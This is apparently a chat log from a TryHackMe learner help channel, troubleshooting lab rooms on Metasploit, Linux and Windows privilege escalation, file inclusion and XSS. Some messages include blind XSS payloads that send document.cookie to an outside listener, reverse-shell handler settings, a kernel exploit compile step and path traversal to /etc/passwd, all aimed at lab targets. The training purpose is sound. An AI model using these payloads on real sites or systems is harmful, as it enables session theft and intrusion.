i wonder how it happeded/

?

☹️

The first step qoth trouble shooting is to ask what changed, right? Can you roll back?
If you do not have a lot of settings changes, reimaging might be an option?

the problem was it swithed to undercover mode automatically

i had no idea as well

its so cool

hi

when should I start doing CTFs ?

I did pre security, now in JR pentester I'm doing burp suite

I feel like I'm just learning but not practicing

I think you should. You'll probably find yourself following writeups but you'll be learning nonetheless. It's good to get your hands dirty alongside the learning paths at least in my experience so far.

You can begin to utilize the tools you've been learning about

thanks I'll try

Gave +1 Rep to @delicate tide

Guys,my friend and I are eager either join or create a team,so anyone interested dm for further discussion)

Yep i saw you message the same thing in another channel. Don't think youre supposed to be doing that.

Definitely am supposed cause post it)

Weird maaan

Hi all, still running into issues with Metasploit: Exploitation initializing a reverse proxy, I launched the .elf downloaded it to the box, chmod to run the rev_shell.elf, started msfconsole, use exploit/multi/handler, set payload php/reverse_php, set attacking system IP and port from rev_shell, msfconsole output "Started reverse TCP handler on 10.10.32.231:9000", box output "Segmentation fault (core dumped)" where do I run the hashdump module? where is the shell?

did you set local host and port?

on the exploit? yes for sure

did you set your attack machine running the handler to listen before executing the rev_shell on the target?

is this the eternal blue payload?

i never tried running the handler first... ill go through the steps again the attackbox was disconnected

no this isnt eternal

Make sure you are using the same payload for your handler as you used to generate the .elf file in msfvenom

https://github.com/rapid7/metasploit-framework/issues/12142

so if it generates a tcp rev shell then i need a tcp payload?

that article may help as well, looks like a similar issue

Not only it has to match the tcp part, it has to match exactly the payload you used in msfvenom

make sure the slashes and underscores match up exactly

that was it! i changed my payload to linux/x86/meterpreter/reverse_tcp, and started the shell after i ran the exploit

now i have a running shell! thank you @worldly orchid and @shadow echo

Gave +1 Rep to @worldly orchid

thank you @shadow echo

RIP Rep

You are welcome, not a big deal because of the rep 🙂

Gave +1 Rep to @shadow echo

glad you got it figured out!

Hello guys, I'm doing the Metasploit module, but I'm facing difficulty using the search command because it usually returns too many modules. Is that a way that it would return only modules that match all the terms that I want? For example, I would like to search for a module that contains the terms 'smtp' AND 'relay'

Just write the keywords? So search smtp relay

Ok, but this way it acts like "search smtp OR relay", which ends giving more results than only searching for 'smtp'. Maybe it don't have another way, but I only want to be sure

What's the version of metasploit you are using? As that's the result I get with that search:

I get it. I'm using msf5

Thank you!

I'm on authentication bypass task 3 and not sure what I'm doing wrong here. I outputted the users from task 2 into a text file and cleaned it up, but still nothing.

Oh. Hmm. cating the file outputs nothing, but if I nano into it I can see them.

Aha, had to tell nano to save the file as DOS format instead of Mac format

@ruby smelt aha!

hi guys i just passed my eJPT exam today... thank you for all the support ❤️

well done, congratulations 🎊

Congratulations! Are you going to try for another certification or are you staying with this one?

Hello, kinda new here. I have A+ and Sec+, attempted Net+ and will again. Striving for a career in Pentesting. I assume this is a good place to come for career path advice?

k

Please don't ask the same question over several channels

I got a question on a cross site scripting question in jr pentesting ive been stuck on

can anyone help me with rlwrap

In -fs switch what size should i use in subdomain enumeration

Hello... I am new here...

I need a guide to go further in cybersecurity...

#start-here

for now i stick for this one. after I grad ill grab another certificate

I'm going through Windows Privesc room and the target machine I'm supposed to use for Task 6 does not have internet access. I don't understand how I'm going to reverse shell a machine with no internet access. Is there an issue or am I missing something?

yes

yes that's cool, I can wait

ah, thanks for trying

I have tried it a few times

I also watched a tutorial on youtube and in the video the guy's target machine has internet access

yes

I don't think it's intended because the directions say you can connect to the target system:

You're supposed to generate a msfvenom payload and move it to the target machine

none of this can be done if the target has no internet

I also can't ping the target from the attackbox

windows machine's don't respond to pings

All Victim machines do not have internet access for obvious reasons.

Where does it say that?

Oh that's on all the THM victim machines?

"Victim machine" sounds so terrible, we are not looking for victims 😄

yeah haha

target machines I guess

Sounds better, ye 😄

THM Reddit mod's words, not mine 😂

I see, so it should still work

Target machines are connected to thm network that you can access using either the attack box in browser or OpenVPN on your own machine or VM. They don't need to have access to the internet.

I recommend going through some basic networking concepts to understand how networks and VPN work

You're in a LAN with the target. You use your tun0 ip, that's your VPN IP that's on a lan with the target.

OH, that makes total sense. I can understand why the targets are configured that way. Thanks for the clarification!

Gave +1 Rep to @idle bison

Hey guys, just working on Linux PrivEsc: Privilege Escalation: PATH and I'm a bit stuck on something. When I run the path app, it doesn't launch a bash session as root. I noticed the first few steps in the screenshots we performed as root on the target machine. Could that be the reason?

karen@ip-10-10-133-158:/tmp$ ls -l path
-rwsr-xr-x 1 karen karen 8392 Feb 14 20:00 path

karen@ip-10-10-133-158:/tmp$ ls -l thm
-rwxrwxrwx 1 karen karen 10 Feb 14 20:10 thm

permissions look correct

or the SUID bit is set

Not to me, it's not root owned

ah yeah, of course

ermm so I need to compile it as root then on the box but in the guide I don't see where I gain root on that box

oooh so it needs to be an existing file owned by root but that karen has write permissions to?

no

When you write it, it'd kill the suid permissions

I'd recommend pausing that linux privesc room and doing Deja Vu if you want what is, in my opinion, a very thorough explanation of the PATH exploit.

Full disclosure, I did create it but I've had a lot of positive feedback over that explanation

hahah OK mate, I will do that. Thanks for the suggestion

https://tryhackme.com/room/dejavu

Yup yup, already on it. Thanks again @idle bison

Gave +1 Rep to @idle bison

Sorry @idle bison but I must still be missing something. In your room, the ServerManager app is already owned by root with the SUID bit set

My issue was that in the screenshot, the path app is compiled by root but I don't see where you gain root in that room

gcc doesn't exist on the box and can't be installed by karen

so I compiled it on my own box and transferred it over but then it only has Karen's permissions

am I supposed to follow the guide precisely or should I be trying to get root some other way to compile the app on the target box?

or should I drop back down to a standard user as in the screenshots. if the latter is the case, it doesn't make sense to drop back down to a standard user to complete the task so I think I must be missing something important

Gave -1 Rep to @idle bison | James

Kidding...

So you can't get root from it, it seems

This was a little confusing for me as well before I read the hint in that task. There is already compiled executable that will run the 'thm' you created and set the suid bit in the process

Hint ||You can add the writable directory to your user's PATH and create a file named "thm" that the "./test" executable will read. The "thm" file can simply be a "cat" command that will read the flag file.||

hi

I'm doing burp intruder

out of scope requests are caught by the proxy

I don't understand why

I've set it in the target tab, and I disabled logging of out of scope proxy traffic

does anyone have a clue

and yes I've checked "in target scope" in the proxy options

sorry I meant they're intercepted

in my "include in scope", there's the target IP (the Bastion Hosting website)

and in my "exclude from scope" there's nothing

when I turn intercept on, everything is intercepted, out of scope requests too

they're not suspended because the pages load on my browser

but they show up in the proxy

yes

this is checked

they show up in the proxy, in the intercept tab, like they were intercepted, but the pages load

for example as soon as I turn my intercept on it intercepts my twitch requests even tho it's out of scope, but without stopping the twitch requests

I still have the forward and drop buttons clickable

you want the whole thing?

what is that

everything works fine now

thank you

Hey guys, i'm actually doing the Windows Privesc room and I don't know why but it seems that the command "sc" in Powershell is not working
when I'm running for example:
sc qc "FoxitReader"
i do not have any result
do you know why ?
thx for the help🙂

sc is an alias for set-content in powershell. So either run that command in CMD or use sc.exe

@shadow echo thank you, i've just realized what I was doing wrong, I was running it in Powershell...

Gave +1 Rep to @shadow echo

Hey doods, I'm at the last point question in the File Inclusion

Can I host a file to make the website fetch?

You can, yes

cheers, looking into it

Thanks for the tip, saved my sleep tonight 😄

Gave +1 Rep to @shadow echo

Hello. I'm having an issue with the Linux PrivEsc room, Task #2. I've seen others with the same issue but no solutions. The issue is in creating the UDF I get a file too short error. See below:
mysql> create function do_system returns integer soname ‘raptor_udf2.so’; ERROR 1126 (HY000): Can’t open shared library ‘raptor_udf2.so’ (errno: 22 /usr/lib/mysql/plugin/raptor_udf2.so: file too short)

Hi. I'm trying to do an attack using burp intruder. In BurpSuite Intruder room give us username and pass credentials when try to do attack there is no 200 response for credentials. Can anyone help me ?
room link: https://tryhackme.com/room/burpsuiteintruder
Task:10

Hello everyone,I need help in the last task in the xss room

After decrypting the hash I can't complete the task

Did you open the ticket with the payload that you created on your own ?

yes

Then that's the reason, you only received your own session cookie, instead of the session cookie of a staff member

You have to wait until the automation that's behind is getting triggered to open your ticket as a staff member

mmmm,ok

It steel not working

Maybe you have to restart the target machine and create a new ticket and/or use the request catcher, this machines task is a bit finicky

Thanks

I need help

In pickle rick

Anyone here?

-unmute @sand wigeon Please don't try to ping everyone. There's 120 thousand people in this discord, it'd be very rude to ping them all at once.

🔊 Unmuted kalyugera#4869

Sorry 🙇🏻‍♂️

I'm only 20% done but maybe i can help?

Still need help?

No I solved that. thanks

Gave +1 Rep to @gusty fulcrum

I really hope that is not enabled in the server for anyone.

Nmap Advanced Port Scans - Task 2
Neither of these options return any open|filtered ports -sF, -sN, -sX

Could you send a screenshot of your results ?

with -v or -vv?

Doesn't matter, just the final result nmap gives you after doing the FIN scan

shit

forget it

I found the error myself

jeez, one should connect via VPN first.... -.- Sorry

forgot that I rebooted the VM after an update

Hello 😀 I am on Linux PrivESc Task 5. Kernel Exploits. I have transfered this exploit CVE-2015-1328 to the target machine by python webserver. But I am having problems executing the 37292.c file. I tried changing permissions also, in the screenshot. Does anyone have a helpful clue to help me complete this task? Thank you .

It's a C file. C is a compiled programming language - before it can be executed, it must be compiled to a binary (executable, like exe) file

Got it! Thanks so much 👍😀 @idle bison

Gave +1 Rep to @idle bison

somehow gcc is easy to use with standard settings

OK @sage current thanks I will try gcc 👍 great support 😃

oh huh thought you already figured out how to compile the code

No not yet.

gcc is just one option but it is also a very good one to choose

gcc is not quite but almost universal across the entire linux space

Yep it worked with this gcc command: gcc 37292.c -o outp Thanks again for the help 😃

Hello😀 , I am working on the file inclusion room and I've been trying to find the third flag for a while now. I changed the get request to a post request since the get request does not accept special characters but even at that, when I include /etc/flag3%00 I still can not get the flag. I also tried path traversing but that still did not work. I need some help

Would be best if you verify in order to be able to send screenshots and then show a screen of your request

!docs verify

why this return true? table name is 'users'

Maybe there is more then 1 table

thanks

No I meant a screenshot of the request you are making, not the error/warning you get as reply.

Okay, well that's most likely not going to work that way, as your %00 will get URL encoded if you send the request like that by using that file inclusion box. So try to use the network tab of the developer tools, or use Burp or curl

You need to do it in burp

Okay, let me try that. Thanks

Capture it in the proxy > send to repeater > at the bottom you need to include it by typing file={path to flag}

With the nullbyte at the end of the file request

Like fontaene said

I found the flag😃
Thank you for the help @shadow echo and @final perch

Gave +1 Rep to @shadow echo

Congrats sir

On to SSRF haha

+rep @final perch

Gave +1 Rep to @final perch

Help me

Why dir is necessary

I just want to know 🙂

This is pickle rick room

try gobuster dir - u ...

Why there is a need for dir

Can you please explain me?

gobuster [Mode][Options]

the mode you're trying here is dir

gobuster dir -u $IP

I believe for that room just need basic dirb command

Either works

helps you find anything that you can take a look at that may not have been visible to you previously basically

Yes you are right

But i saw walkthrough video of john hammond and he was just using gobuster -u.

Personal preference I think, I’m not that experienced lol

So i just want to know why gobuster dir -u will be used.
I am new in this that's why i want to know.

i think in the previous versions of gobuster you didn't have to specify the mode now you can do dns or vhost enum plus the dir

And also here need to replace $IP with actual IP address

2.0.1 doesnt need dir to be specified

seems it defaults to dir mode

this on ubuntu with the latest version of gobuster in the ubuntu repos

Thanks a lot

apparently the ubuntu repo version is quite old according to the kali repo version

or well it is one major version behind only

Hi! I'm working in the room "Authentication Bypass". Having a problem with FUZZ. With all ffuf commands I get this error: Encountered error(s): 1 errors accured. * stat names.txt : no such file or directory. Has anyone else had this problem? How can I fix it?

If it's an exported variable then...

Nobody care to help me?

Don't know your command, but that error is suggesting that it can't find the names.txt so try to provide the full path to the file

screenshot of the command and also a screenshot of catting said names.txt file

please and thank you

@steel nexus ⬆️

Yes. The problem was that the full path was not provided in the code. It is solved now.

Hi! I just don't get his "File Inclusion" . I understand the technique, but the logic is either very difficult or explained poorly.

Which part

Need to specify a bit

hey anyone give reasorses to learn pentesting

from noob to advance

https://tryhackme.com/

hi

In walking an application, I found a flag

but it wasn't used anywhere in the room

||THM{CHANGE_DEFAULT_CREDENTIALS}|| this was the flag

that rooms target machine is used for multiple rooms and things so of course it has some flags that feel unused but are used elsewhere

lmao, I stayed for like 40 minutes trying to figure out what spelling mistake was ther

i.e used in other rooms

What are the advantages/drawbacks of gobuster vs duff vs dirb?

well duff is for sure the best drink out of the 3

but on a more serious note it has to do with availability and standard used list and how it formats outputs

Ooops I meant fuff. So they are basically equivalent?

nah they also have some special options that can be used that the others sometimes lack

when it comes to fuff that is

You mean fuff lacks some options or the opposite

the opposite

fuff has some options that are not included in gobuster

and gobuster does not run recursivliy on directories while dirb can and do by default @cinder forge

So fuff>dirb>gobuster in terms of options?

well nah sometimes one is better then the other but it is specific for just that specific use cases

OK thank you!

h hhi...

hello guys
i am working on the attactive directory room (windows active directory)
i keep getting this error "import error: no module named pyasn1.codec.der" whenever i use the GetNPUsers.py tool in impacket to query ASReprosatable accounts

please anyone with any suggestion

on how to tackle the issue

yo

yeah i know

Has anyone completed the room "Ice"? I having problem in one of the question.

while using the exploit, it is required to set the session right. When I set session 1, run the exploit it dosent work.

here is the exploit/windows/local/bypassuac_eventvwr

Module options (exploit/windows/local/bypassuac_eventvwr):

Name Current Setting Required Description

SESSION yes The session to run this module on.

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description

EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 1.1.1.1 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port

Exploit target:

Id Name

0 Windows x86

for the lhost im using my ip. so the problem is not there

how do i set it. I set it 1, but it is not working.

how do i set a session? when i list sessions it say I have no active sessions.

maybe. let me try again.

Ooo i forgot to get back to you, it worked I used ctrl c instead of ctrl z. thankx buddy for the help

thankx buddy.

Is the path free

!docs freepath

https://tryhackme.com/resources/blog/free_path

Don’t think this one specifically is at certain point

But 10 it’s worth a trial if you got value from other free modules

uuum can shadow get some help with the Metasploit: Meterpreter room on task 5 question 2: shadow get this result when running the post exploit for that question:

it seems to kill the meterpreter session each time

how can shadow get around that???

Have tried to restart the target machine already and give it a good 5 mins to make sure it's fully booted ?

nope not tried that

but everything seemed to work... including getting a meterpreter shell back

just it seems to kill itself when shadow runs the post

anyways going to reboot the target and try again

Ye, maybe it's not solving the issue, who knows, but I guess that's the easiest thing to start trying with when it comes to weird behaviour

will keep you updated if it works better this time

Well yea ik basic of other stuff but i wanted to learn more bout pentesting and i found this path so i was wondering if i have to get vip to learn this path

well turns out shadow could get the info form the sysinfo command in the meterpreter shell... the module did still not work but whatever when all the other stuff worked nicely

I'm in the LFI room. I managed to get to the passwd file in the lab n2 ||by requesting .. /.. /.. /.. /etc/passwd|| However, in order to determine the number of dot dot slashes, I had to manually increment it until getting the desired output. Could I have guessed the number of dot dot slash otherwise?

No, you just have to try until you get it as you don't necessarily know which directory you might be in

Although you could set up a script that would add" ../" everytime until the website gives you a different response

or you could just go with 20 ../ because if you try and access a dir over the root dir that way nothing happens and you just get the result you want

Were you able to see warnings/errors on the page when using the wrong amount of directory traversals? If yes, then you could have determined the amount.

Never knew this, will remember, thanks Shadow

shadow tends to do it by trail and error still but if shadow has a short amount of time they will just copy a super long string of ../ to do it that way

when i try to move seclists from desktop to user/share/wordlists it gave me that error what can i do to it

I'm doing Burp Suite hashing and at the end we have to find which key has the right hashsum of 3166226048d6ad776370dc105d40d9f8, I've tried hashing the keys with the last newline and without it but I never get the expected hashsum

I know it's ||key3|| I've looked it up but I can't figure out why I don't get the right hashsum

in Burp I hash it in MD5 then encode it in ASCII Hex

I'm copying the key from the first character to the last, with and without the last newline

I'm looking to see if I can get it to match as well and if I recall I never did get Burpe Suite to show it correctly, I just did md5sum command in cli

When I do it in Burp Suite i get one that starts with d2fe

Oh that's neat

Yes, but there are several paths in the error message and I dont understand which one to use

You got a screenshot ?

So it's saying /var/www/html/lab2.php which is the page you requested in your url. Therefore you would need 4x ../ to get all the way back to the root directory.

So 1 time to get out of the lab2.php file itself, and 3 times to get back to the root directory.

But isn´t the directory name ¨includes¨?

Ah ye, you right there is an includes directory in the function.

Then it cant be /var/www/html/lab2.php right?

Sure, that's still the directory you are in. But it would be /var/www/html/includes then

which still makes 4 jumps... TY!

Scratch that last explanation about getting out of the lab2.php itself, I think I was wrong with that. So in case there would have been no includes directory in the function itself, it would have been just 3x the traversal to get back to the root directory. 🙂

Yes, I get that

ty

even outside of Burp I can't get the right sum

Could you show a screenshot of the key in burp where the start and the end of the key can be seen ?

It seems you are missing parts of your key. The BEGIN OPENSSH and END OPENSSH parts belong to the key, so you can not remove them, otherwise your md5 is not right anymore

oh wow

I didn't even think of trying that

thank you

Gave +1 Rep to @shadow echo

In the Blind XSS I can't seem to get netcat to work to catch the cookie, and the THM Request Catcher doesn't seem to be working either...I feel like im doing this right but Ive been waiting quite some time to get the request back...what should I do at this point?

I understand how it works, i just can't get it TO work lol

Are you using your own machine or the attackbox ?

The AttackBox

Could you show me your payload ?

</textarea><script>fetch('http://83765a8b378a4b5cfbf9924178f3134b.log.tryhackme.tech?cookie=' + btoa(document.cookie) );</script>

oh dunno why that showed up as a link but yea

Oh, I should have said, the payload for nc

oh lets see

</textarea><script>fetch('http://0.0.0.0:9001?cookie=' + btoa(document.cookie) );</script>

That's not your attackbox IP. 0.0.0.0 only means nc is listening on all of your interfaces

ooohhh

let me see if that works

how long does it usually take?

Not longer then 2 - 3 mins. But maybe you messed up the machine with the bad payloads you created previously

So restart the target machine

Ill wait a bit longer and I can try to reset the machine and try again after that

hmm still not doing anything

Ill come back and try again later tho.

Anyone else have issues with the favicon md5 hash?

search says yes...nvm...will try what someone put in for a fix

nah right web address

I didn't. You still having issues?

I just searched the answer. I had all the correct information but still was getting the incorrect hash value

What's the full command you used

What are you using to export OpenVas report to Excel?

By openvas you get a pdf or xml file but i heard some tools you can covert that info easly to excel.

foo, my XSS practical does not seem to be working or capturing the cookie 😦 ive tried it in both netcat and the THM listener a few different times with the correct IP and correct listener link

</textarea><script>fetch('http://10.10.102.62?cookie=' + btoa(document.cookie) );</script>

And then for the other one it was </textarea><script>fetch('http:baa4f283199cac95a6a5c6a7013f1ead.log.tryhackme.tech?cookie=' + btoa(document.cookie) );</script>

For the netcat one i did nc -nlvp 9001 (oh and i forgot to add I added :9001 to the end of the ip in the script)

hmmm let me look around a bit

So is the IP address the one listed under "Active Machine Information" or the one listed in the terminal?

ok, tried that one too

Did you ever find out about this im having the exact same problem, and rebooting the box didn't help, i can see the sitmap.xml under netowork but cant access it, was i missing something obvious?

I lost my free attack box session so i need to subscribe, if i remember correctly it was 10.10.35.(maybe 137)

oh so i was using the wrong machine? Lmao! wow okay lol thanks for clearing that up!

I am in linux privsec kernal exploit
I am trying to move my exploit to the target machine and it says it does not have permission to write files
I am using wget method from httpserver (as it says in the task to do)

Then you have to look for a directory on the target machine where you have write permission in

Got the solution its tmp actually i had missed it

@shadow echo bro can i learn and join ethical hacking amd cyber security even though i am in commerce stream?

I wouldn't see a reason why not, as you are on tryhackme that means you already doing it. If you refer to a career, you might want to ask in #cyber-and-careers . There a probably people with more knowledge about it, but I wouldn't see a reason to why not there either. Read about the success stories here: https://tryhackme.com/resources/blog

Am I adding the .txt file incorrectly here? under metasploit room

Not sure what I've done wrong if anyone knows

thank you I had the path wrong lol

Gave +1 Rep to @steel nymph

long day

I can't manage to make the THM request catcher to work... sending screenshots

gimme a sec

I am coming to the same conclusion...

For the XSS room

I used NetCat, but since the room mentioned the THM catcher, I figured out I would try it

adding it into /etc/hosts kinda works,

like so